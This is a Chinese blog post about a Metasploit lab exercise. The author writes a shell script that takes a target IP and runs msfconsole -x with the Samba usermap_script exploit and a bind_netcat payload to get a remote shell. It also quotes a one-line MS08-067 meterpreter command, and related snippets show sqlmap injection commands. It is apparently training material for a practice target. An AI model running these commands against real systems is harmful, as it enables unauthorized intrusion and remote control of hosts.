Day4:shell脚本的尝试

最新推荐文章于 2020-02-14 20:16:21 发布
最新推荐文章于 2020-02-14 20:16:21 发布
阅读量463 收藏 1
点赞数 1
分类专栏: Metasploit 信息安全 linux 文章标签: 脚本 shell metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38034182/article/details/76890401
版权
信息安全 同时被 3 个专栏收录
12 篇文章 1 订阅
订阅专栏
Metasploit
8 篇文章 0 订阅
订阅专栏
linux
4 篇文章 0 订阅
订阅专栏

Day4:shell脚本的尝试

当我看到书上的魔鬼训练营实践作业时,我把关注点放在了第四个上面,然后就兴致勃勃的去运行msfcli但是竟然没有这个软件?
wtf
什么鬼?没有更新?突然想到:会不会是功能升级了 变成了其他的!于是我就上网查了查,果然…Festinatione facit vastum

溯回传送门

msfcli?不存在的!

书上的原题是这样的:

使用msfcli命令行接口编写一个Shell脚本程序,实现用户只需输入目标Linux靶机的IP地址作为参数,就可以使用usermap_script漏洞渗透攻击模块,获得靶机的远程Shell访问。

可是没有了msfcli我应该怎么办(`゚Д゚´)ゞ ,我总不能自己编写一个吧。不然,多动(bai)脑(du)。
然后我发现,早在2015年7月10日,官方就取消了msfcli,而采用其他方法代替:
官方声明: Msfcli is no longer available in Metasploit

具体如下:

Hi everyone,

This January, we made an announcement about the deprecation of Msfcli, the command line interface version for Metasploit. Today we are ready to say good-bye to it. Instead of Msfcli, we recommend using the -x option in Msfconsole. For example, here’s how you can run MS08-067 in one line:

Hi, 大家好,
这个一月份,我们做了一份关于 Metasploit 的命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。
取代 Msfcli,我们推荐你在 Msfconsole 使用 -x 选项。
举个例子,我们如何在一条命令中使用 MS08_067 模块。

./msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run”

You can also leverage things like resource scripts or even command alias to do less typing. Here’s an example of how you would write a resource script to automate running MS08_067:

你也可以把它在msfconsole中分步写或者做成脚本形式 (resource scripts) 或者设置别名来简化输入。下面举个例子如何在msfconsole中分步使用 MS08_067 模块。

use exploit/windows/smb/ms08_067_netapi
set RHOST [IP]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP]
run

And then run it:

然后运行:

./msfconsole -r name_of_resource_script.rc

Another way to run a resource script if you’re in msfconsole already:

上面的命令也可以做成源脚本,然后输入以下命令使用

msf > resource name_of_resource_script.rc

第一个shell脚本

解决方法已经有了,那我们就动手开始吧:
我一开始是这么写的,不存在shell的写法很迷:

use multi/samba/usermap_script
set payload cmd/unix/bind_netcat
set RHOST xxx.xxx.xxx.xxx
exploit

这是什么,我自己绝望了。

失败

突然想到,这是shell脚本啊:
于是有了exploit.shell:

root@kali:~# vi exploit.shell

echo “请输入目标IP:”
read ip
msfconsole -x “use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $ip;exploit”

root@kali:~# chmod +x exploit.shell
root@kali:~# ./exploit.shell

然后

成功

成功

成功

JYFelt
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shell自动脚本尝试
安全DOG
03-01 240
工作中有个每隔一段时间删除日志的需求,防止内存不够使用,所以需要不定时的执行删除文件的操作,因为比较繁琐,所以尝试shell脚本自动执行的操作,学习了shell脚本的基础写法 需求:日志文件用年-月-日来做文件名,所以可以根据时间来删除日志文件,时间间隔30天,所以需要写一段输出当前天数前30天来验证一下。 开头 开头写#!/bin/bash是固定写法,它可以告诉系统这个脚本需要什么样的解释器来...
Metasploit使用msfcli命令行接口编写shell脚本程序
m0_46161993的博客
07-01 1030
问题描述   使用msfcli命令行接口编写一个Shell脚本程序,实现用户只需输入目标Linux靶机IP地址作为参数,就可以使用usermap_script漏洞渗透攻击模块,获得靶机的远程Shell访问。 解决办法   由于2005年时便取消了msfcli,因此使用msfconsole -x来代替msfcli。   先提供脚本内容如下: #!/bin/bash #表示使用Bourne Again Shellshell类型 echo "Please set remote host(RHOST) IP"
黑板课爬虫闯关第三关
废柴奶萌兔的博客
01-04 546
在前两关结束之后,进入第三关, 这里需要我们注册,注册后再登录页面 题目说比上一关多了两层保护,我们可以看到顶部有个注销按钮,也就是说首先要先登录才能继续做题。首先观察在登录的时候除了用户名和密码到底还发送了些什么。 打开chrome,在登录界面,右键点开Inspect,然后在昵称和密码区域分别输入自己的用户名和密码,点击登录,可以在Network中看到如下的变化,
sqlmap命令详解
java_java_cl的博客
02-14 1595
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sqlmap.py -u...
metasploit运行run vnc
热门推荐
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Shell脚本遍历一个日期范围实例
09-15
在IT领域,Shell脚本是一种常用的自动化工具,尤其在Linux或Unix系统中,它能帮助我们执行一系列命令,包括处理文件、系统管理以及各种复杂的任务。在这个实例中,我们将探讨如何使用Shell脚本来遍历一个特定的日期...
happyday06-shell脚本书写技巧.txt
04-29
happyday06-shell脚本书写技巧.txt
两个备份数据库的shell脚本
01-10
备份数据库的shell脚本一 代码如下:#!/bin/bash#指定运行的脚本shell#运行脚本要给用户执行权限bakdir=/backupmonth=`date +%m`day=`date +%d`year=`date +%Y`hour=`date +%k`min=`date +%M`dirname=$year-$month-$...
motd:motd脚本
03-15
“motd.sh”是一个自定义的shell脚本,特别针对树莓派系统设计。这个脚本不仅会显示一个吸引人的ASCII艺术标语,还可能包含一些关于树莓派的基本信息,比如系统版本、内存使用情况、网络状态等。通过这个脚本,用户...
使用Linux shell脚本实现FTP定时执行批量下载指定文件
09-15
这时,我们可以编写一个shell脚本来实现这一功能,并通过cron定时任务进行自动化执行。下面详细讲解如何利用shell脚本和FTP命令实现这个过程。 首先,我们需要了解几个关键概念: 1. **Shell脚本**:Shell脚本是...
Matesploit在中文版系统上安装出错解决方法
Festinatione facit vastum
08-03 546
Matesploit在中文版系统上安装出错解决方法错误信息There has been an error. Error Running …/postgresql/bin/psql.exe -U postgres -p 7175 -h localhost …错误原因PostgreSQL对中文支持有问题导致的解决方案可以在“控制面板→区域与语言选项→格式”,改为“英语(美国)”,在安装便可解决,安装结
在Linux操作系统上安装Matesploit
Festinatione facit vastum
08-03 4454
在Linux操作系统上安装Matesploit“作为开源社区的忠实fans,Linux才是我的理想工(zhuang)作(bi)环境,所以要学会如何在Linux操作系统上安装Matesploit是至关重要的” —沃兹基·硕德 溯回传
Kerckhoffs原则
Festinatione facit vastum
08-21 1万+
Kerckhoffs准则认为,一个安全保护系统的安全性不是建立在它的算法对于对手来说是保密的,而是应该建立在它所选择的密钥对于对手来说是保密的。1、算法公开。算法应当经得起公开的检验。2、Open Cryptographic Design公开的设计经受公众的仔细检查,印次可能更为强壮如果体制的安全依赖于算法的保密性,那么代码反向工程将会成为安全性的极大威胁公开设计似的标准的建立成为可能如果存在安全瑕
Kali Linux运行 Metasploit Framework
u011500307的专栏
10-28 2657
运行 Metasploit Framework 依照Kali Linux网络服务策略,Kali没有自动启动的网络服务,包括数据库服务在内.所以为了让Metasploit以支持数据库的方式运行有些必要的步骤. 启动Kali的PostgreSQL服务 Metasploit 使用PostgreSQL作为数据库,所以必须先运行它. service postgresql start
(转载)Exploitshellcode经验技巧杂谈
Kendiv's Box
11-12 2627
Exploitshellcode经验技巧杂谈转自:http://www.xfocus.net创建时间:2003-07-14文章属性:原创文章提交:OYXin (oyxin_at_ph4nt0m.net)OYXinOYXin@ph4nt0m.net                          Exploitshellcode经验技巧谈    这篇文章不是教你如何去写exploit,shel
设置正确的线程数量
架构和代码
01-30 4578
    《高性能服务器架构》中提到了SEDA,我搜了一下,发现这篇文章《SEDA性能优化的分析和模拟》,对于线程数量的建议。假如一个Web请求,代码执行的时间为ST(Service Time),读文件、网络调用之类IO等待时间为为WT(Wait Time),CPU的个数是N、核数是M则线程数量TC(Thread Count)为:     TC= N*M*(1+WT/ST)
在Kali Linux上使用Metasploit
酷狗直播-锦凡歆的博客
04-26 2038
在Kali Linux上使用Metasploit Kali Linux是最受安全从业人员欢迎的操作系统,第一、它预装了几乎所有流行的渗透测试工具,降低了使用成本,其次它是基于Linux的操作系统,具有可靠的稳定性和安全性。 作者: 锦凡歆在‘来疯’直播唱歌最好听 准备工作 你可以在物理机上安装Kali Linux,也可以在虚拟机中安装它,安装过程非常简单。 在Kali Linux设...
metaspolit 安装后无法启动命令行msfcli的解决方法
earthfans的专栏
07-10 4911
1246  sudo bundle install  1253  sudo apt-get install postgresql  1261  ./msfcli  1262  sudo bundle install  1263  sudo gem install bcrypt  1264  gem list  1265  gem install mkmf  1266  sudo
欢迎使用CSDN-markdown编辑器
xfox_handsome的博客
01-25 180
第一章课后作业 samba服务usermap_script安全漏洞 对linux靶机进行攻击,并植入VNC图形化远程控制工具的攻击载荷 使用msfcli命令行接口编写一个shell脚本 samba服务中的usermap_script安全漏洞 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值